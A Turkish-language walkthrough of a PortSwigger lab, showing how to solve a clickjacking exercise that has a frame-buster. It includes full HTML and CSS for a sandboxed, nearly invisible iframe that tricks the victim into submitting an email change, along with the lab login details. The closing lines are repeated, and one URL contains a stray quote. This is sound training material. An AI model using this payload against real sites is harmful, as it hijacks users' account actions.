Herkese Merhabalar Bugün Tekrardan ClickJacking Lab'ı Çözeceğiz Fakat Bu Sefer Farklı
Bu sefer formları kullanmamıza izin yok peki nasıl çözeceğiz ? Hadi şimdi bakalım
İlk başta tekrar My Account'a basalım
Önceki clickjacking konularımı okuyanlar yapacaklarımızın çoğunu biliyor
ve hesabımıza girelim
wiener peter
Ve email'imiz şu şekilde:
Ve url'e şu şekilde parametremizi girelim
Evet şimdi exploit server'a gidelim
Body kısmında hello world yazıyor önceki clickjacking lablarındaki gibi
şimdi ise önceki çözdüğümüz clickjackinglerden farkı ne diyerek önceki kodları yazıyoruz
HTML:
<iframe src="https://laburl/[email protected]"></iframe>
ve clickjackingin en önemlisi olan iframe'e izin vermiyor
bu yüzden iframe'i şu şekilde düzenliyoruz
HTML:
<iframe sandbox="allow-forms" src="https://laburl/[email protected]"></iframe>
şimdi ise geri kalan kodlarımızıda yazalım
HTML:
<style>
iframe {
position: relative;
width: 1000px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position: absolute;
top: 478px;
left: 60px;
z-index: 1;
}
</style>
<div>CLICK ME</div>
<iframe sandbox="allow-forms" src="https://0a82003b03cb94ffc00e93520"052001e.web-security-academy.net/[email protected]"></iframe>
<div> etiketi CLICK ME yazısını göstermeye yarıyor
<style> ise Bizim yazı ve iframe'i ortalamamıza ve boyutlandırmamıza yarıyor
şimdi ise opacity'i 0.000001 yapalım ki arkaplan gözükmesin
ve view exploit diyelim
kullanıcı clıck me ye basınca email'i değişecektir
ve store a basıp deliver to exploit victim'e basalım
ve çözüldü
Beni Dinlediğiniz İçin Teşekkürler Görüşürüz
<style> ise Bizim yazı ve iframe'i ortalamamıza ve boyutlandırmamıza yarıyor
şimdi ise opacity'i 0.000001 yapalım ki arkaplan gözükmesin
ve view exploit diyelim
kullanıcı clıck me ye basınca email'i değişecektir
ve store a basıp deliver to exploit victim'e basalım
ve çözüldü
Beni Dinlediğiniz İçin Teşekkürler Görüşürüz